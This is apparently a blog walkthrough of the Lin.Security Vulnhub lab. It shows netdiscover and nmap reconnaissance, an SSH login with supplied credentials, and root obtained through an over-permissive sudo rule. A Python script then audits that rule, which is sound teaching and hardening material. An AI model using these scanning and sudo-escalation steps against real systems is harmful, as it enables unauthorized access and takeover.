Vulnhub Lin.Security Walkthrough

Lin.Security

Target VM: http://www.vulnhub.com/entry/linsecurity-1,244/
Because the author of the VM provides the SSH username and password directly, this challenge is very simple.

Identifying the target host's IP address

─(kali㉿kali)-[~/Vulnhub/Lin_Security]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.165.0/16   |   Screen View: Unique Hosts       
                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor           
 192.168.56.100  08:00:27:8c:bf:0a      1      60  PCS Systemtechnik GmbH   
 192.168.56.144  08:00:27:d8:9f:d6      1      60  PCS Systemtechnik GmbH 

The netdiscover tool bundled with Kali Linux identifies the target host's IP address as 192.168.56.144.

Nmap scan

─$ sudo nmap -sS -sV -sC -p- 192.168.56.144 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-31 08:56 EDT
Nmap scan report for bogon (192.168.56.144)
Host is up (0.00014s latency).
Not shown: 65528 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7a:9b:b9:32:6f:95:77:10:c0:a0:80:35:34:b1:c0:00 (RSA)
|   256 24:0c:7a:82:78:18:2d:66:46:3b:1a:36:22:06:e1:a1 (ECDSA)
|_  256 b9:15:59:78:85:78:9e:a5:e6:16:f6:cf:96:2d:1d:36 (ED25519)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      42673/tcp6  mountd
|   100005  1,2,3      43901/tcp   mountd
|   100005  1,2,3      48518/udp6  mountd
|   100005  1,2,3      58572/udp   mountd
|   100021  1,3,4      32885/tcp6  nlockmgr
|   100021  1,3,4      35243/udp   nlockmgr
|   100021  1,3,4      40811/tcp   nlockmgr
|   100021  1,3,4      58273/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
40811/tcp open  nlockmgr 1-4 (RPC #100021)
43901/tcp open  mountd   1-3 (RPC #100005)
52643/tcp open  mountd   1-3 (RPC #100005)
57903/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 08:00:27:D8:9F:D6 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.41 seconds

The Nmap results show that port 2049 is open, which is an NFS share.

Privilege escalation to root

“To get started you can log onto the host with the credentials: bob/secret”

Since the challenge itself provides the username and password (bob/secret), we can log in directly over SSH.

┌──(kali㉿kali)-[~/Vulnhub/Lin_Security]
└─$ ssh bob@192.168.56.144                  
bob@192.168.56.144's password: 

██╗     ██╗███╗   ██╗   ███████╗███████╗ ██████╗██╗   ██╗██████╗ ██╗████████╗██╗   ██╗
██║     ██║████╗  ██║   ██╔════╝██╔════╝██╔════╝██║   ██║██╔══██╗██║╚══██╔══╝╚██╗ ██╔╝
██║     ██║██╔██╗ ██║   ███████╗█████╗  ██║     ██║   ██║██████╔╝██║   ██║    ╚████╔╝ 
██║     ██║██║╚██╗██║   ╚════██║██╔══╝  ██║     ██║   ██║██╔══██╗██║   ██║     ╚██╔╝  
███████╗██║██║ ╚████║██╗███████║███████╗╚██████╗╚██████╔╝██║  ██║██║   ██║      ██║   
╚══════╝╚═╝╚═╝  ╚═══╝╚═╝╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝  ╚═╝╚═╝   ╚═╝      ╚═╝  
Welcome to lin.security | https://in.security | version 1.0

bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo -l
[sudo] password for bob: 
Matching Defaults entries for bob on linsecurity:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh,
        /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect,
        /usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more,
        /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi,
        /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl,
        /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp
bob@linsecurity:~$ sudo bash
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# cd /root
root@linsecurity:/root# ls -alh
total 32K
drwx------  6 root root 4.0K Jul 11  2018 .
drwxr-xr-x 23 root root 4.0K Jul 10  2018 ..
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwx------  2 root root 4.0K Jul 10  2018 .cache
-rw-r--r--  1 root root    0 Jul 10  2018 .cloud-locale-test.skip
drwx------  3 root root 4.0K Jul 10  2018 .gnupg
drwxr-xr-x  3 root root 4.0K Jul  9  2018 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Jul  9  2018 .ssh
root@linsecurity:/root# 

This target is very simple. I only tried /bin/bash, because many of the other listed commands can also be used for sudo privilege escalation.
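To see how much of bob's sudo rule is equivalent to full root, the following added example (not part of the original post) parses the `sudo -l` output above and groups each granted binary by risk category, also reporting duplicate entries. The category table is an assumed audit policy keyed by binary basename, not something defined by sudo or by the VM author.

```python
import re
from collections import Counter

# Constructed sample: the rules section of the `sudo -l` output shown above.
SUDO_L = """\
User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh,
        /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect,
        /usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more,
        /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi,
        /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl,
        /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp
"""

# Assumed audit categories (hypothetical policy, keyed by binary basename).
CATEGORIES = {
    "shell": {"ash", "bash", "sh", "csh", "dash", "zsh"},
    "interpreter": {"awk", "perl", "tclsh", "expect", "env"},
    "editor_or_pager": {"ed", "vi", "rvim", "pico", "less", "more", "man"},
    "exec_or_file_io": {"find", "git", "script", "socat", "ssh", "scp", "ftp", "curl"},
}

def parse_sudo_l(text):
    """Return [(runas, command)] from the rules section of `sudo -l` output."""
    entries, runas = [], None
    rules = text.partition("may run the following commands")[2]
    for line in rules.splitlines()[1:]:
        m = re.match(r"\s*\(([^)]*)\)\s*(.*)", line)
        if m:  # a new rule starts with its run-as spec, e.g. (ALL)
            runas, line = m.groups()
        line = re.sub(r"^\s*(?:[A-Z_]+:\s*)+", "", line)  # drop tags such as NOPASSWD:
        entries += [(runas, c.strip()) for c in re.split(r"(?<!\\),", line) if c.strip()]
    return entries

def audit(text):
    """Group granted commands by category and list commands granted twice."""
    entries = parse_sudo_l(text)
    report = {name: [] for name in [*CATEGORIES, "unclassified"]}
    for runas, cmd in dict.fromkeys(entries):  # de-duplicate, keep order
        base = cmd.split()[0].rsplit("/", 1)[-1]
        cat = next((c for c, names in CATEGORIES.items() if base in names), "unclassified")
        report[cat].append(cmd)
    counts = Counter(cmd for _, cmd in entries)
    report["duplicates"] = sorted(c for c, n in counts.items() if n > 1)
    return report

if __name__ == "__main__":
    for category, cmds in audit(SUDO_L).items():
        print(f"{category:16} {len(cmds):2}  {' '.join(cmds)}")
```

Every one of the 26 distinct binaries lands in a category that can start a shell, run other programs or read and write files as root, so the rule amounts to unrestricted root for bob. A hardened sudoers entry would list only the specific commands a user needs, with fixed arguments.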

posted @ 2022-10-31 21:21  Jason_huawen